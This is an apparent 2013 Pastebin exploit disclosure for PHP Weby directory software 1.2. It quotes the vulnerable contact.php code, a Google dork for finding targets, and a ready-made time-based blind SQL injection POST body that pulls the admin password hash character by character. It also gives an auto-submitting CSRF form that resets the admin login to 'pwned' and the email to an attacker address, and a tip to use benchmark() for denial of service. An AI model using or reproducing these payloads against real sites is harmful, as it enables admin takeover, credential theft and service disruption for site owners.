API tools faq
paste
Advertisement
Guest User

php weby 1.2 Blind SQli+CSRF

a guest
Jan 24th, 2013
1,966
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.70 KB | None | 0 0
raw download clone embed print report
  1. ===========================================
  2. Vulnerable Software: PHP Weby directory software version 1.2
  3. Vendor: http://phpweby.com
  4. Download: ht*p://phpweby.com/down/phpwebydirectory.zip
  5. Vuln: Blind SQL injection && CSRF
  6. Dork: intext:Powered by PHP weby software
  7. ===========================================
  8. About Software:
  9.  
  10. Php Weby directory script is a powerful and easy-to-use FREE link management
  11. script with numerous options for running a directory, catalog of sites or a simple
  12. link exchange system. Create a general directory and have users submit their
  13. favorite sites and charge if you want for the review.
  14. Or create regional directory for your town or state and sell advertising,
  15. or niche directory about a topic you love or know.
  16.  
  17. Features include an integrated payment system with PayPal,
  18. link validation, SEO urls, unlimited categories and subcategories,
  19. reciprocal linking, link editor,
  20. template driven system and many more. Check them all here.
  21. Php weby free link directory script is licensed under GNU GPL license.
  22. Link to http://phpweby.com can NOT be removed. Contact us at the forums for more information. .
  23. ===========================================
  24. Tested On: Debian squeeze 6.0.6
  25. Server version: Apache/2.2.16 (Debian)
  26. Apache traffic server 3.2.0
  27. MYSQL: 5.1.66-0+squeeze1
  28. PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
  29. Copyright (c) 1997-2009 The PHP Group
  30. Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
  31. with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
  32. ===========================================
  33.  
  34. Here is one of Vulnerable Code example:
  35.  
  36. //contact.php
  37. ==============SNIP BEGINS===============
  38. if($capt)
  39. {
  40. unset($capt);
  41. if($_POST['fullname']=='' || $_POST['subject']=='' || $_POST['message']=='' || $_POST['mail']=='')
  42. $smarty->assign('error','Please complete the form!');
  43. else
  44. {
  45. $c=$db->Execute("INSERT INTO contacts(fullname,subject,message,mail,ip,timehour) values('" . $_POST['fullname'] . "','" . $_POST['subject'] . "','" . $_POST['message'] . "','" . $_POST['mail'] . "','" . $_SERVER['REMOTE_ADDR']."','".date('r'). "')");
  46. if($c===false)
  47. $smarty->assign('error','Unknown error occured.');
  48. else
  49. $smarty->assign('added',1);
  50.  
  51. ===========SNIP ENDS HERE================
  52.  
  53.  
  54. ===============Exploitation ===============
  55. METHOD: $_POST
  56. URL: http://site.tld/contact.php
  57.  
  58. Headers:
  59.  
  60. Host: hacker1.own
  61. User-Agent: UiUiUiUiUi Ping And UiUiUiUiUi And Pong:((
  62. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  63. Accept-Language: en-US,en;q=0.5
  64. Accept-Encoding: gzip, deflate
  65. DNT: 1
  66. Connection: keep-alive
  67. Content-Type: application/x-www-form-urlencoded
  68. Content-Length: 245
  69.  
  70.  
  71. REQ BODY:
  72.  
  73. fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST
  74.  
  75.  
  76. ===================EOF===================
  77.  
  78. Here is how it looks:
  79. (I prefer timebased way because simply extracting and then inserting hash to table is not usefull anymore.Only admin can see it from admin panel).
  80.  
  81. IMAGE 1: http://s017.radikal.ru/i420/1301/c6/11128cbea352.png
  82. COPY IMAGE: http://oi47.tinypic.com/2ptp79g.jpg
  83.  
  84.  
  85. Also this type of sql injections(INSERT/UPDATE) is usefull to create Denial of Service conditions against target site/server.
  86. If so simply benchmark() is your best friend.
  87.  
  88.  
  89. Second Vulnerability is: CSRF
  90.  
  91. Simple exploit to change admin username/password/email:
  92. Login/password will be change to pwned and email to : admin@toattacker.tld
  93.  
  94. <body onload="javascript:document.forms[0].submit()">
  95. <form action="http://hacker1.own/phpweb/admin/options.php?r=admin" method="post">
  96. <input type="text" name="ADMIN_NAME" value="admin"/>
  97. <input type="text" name="ADMIN_MAIL" value="admin@toattacker.tld"/>
  98. <input type="text" name="usr" value="pwned"/>
  99. <input type="password" name="pass1" value="pwned"/>
  100. <input type="password" name="pass2" value="pwned"/>
  101. <input type="hidden" name="oldusr" value="admin"/>
  102. <input type="submit" value="Save" class="ss"/>
  103. </form>
  104.  
  105.  
  106.  
  107. ====================================
  108. KUDOSSSSSSS
  109. ====================================
  110. packetstormsecurity.org
  111. packetstormsecurity.com
  112. packetstormsecurity.net
  113. securityfocus.com
  114. cxsecurity.com
  115. security.nnov.ru
  116. securtiyvulns.com
  117. securitylab.ru
  118. secunia.com
  119. securityhome.eu
  120. exploitsdownload.com
  121. osvdb.com
  122. websecurity.com.ua
  123. 1337day.com
  124. itsecuritysolutions.org
  125.  
  126. to all Aa Team + to all Azerbaijan Black HatZ
  127. + *Especially to my bro CAMOUFL4G3 *
  128. To All Turkish Hackers.
  129.  
  130. Also special thanks to: ottoman38 & HERO_AZE
  131. ====================================
  132.  
  133. /AkaStep
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!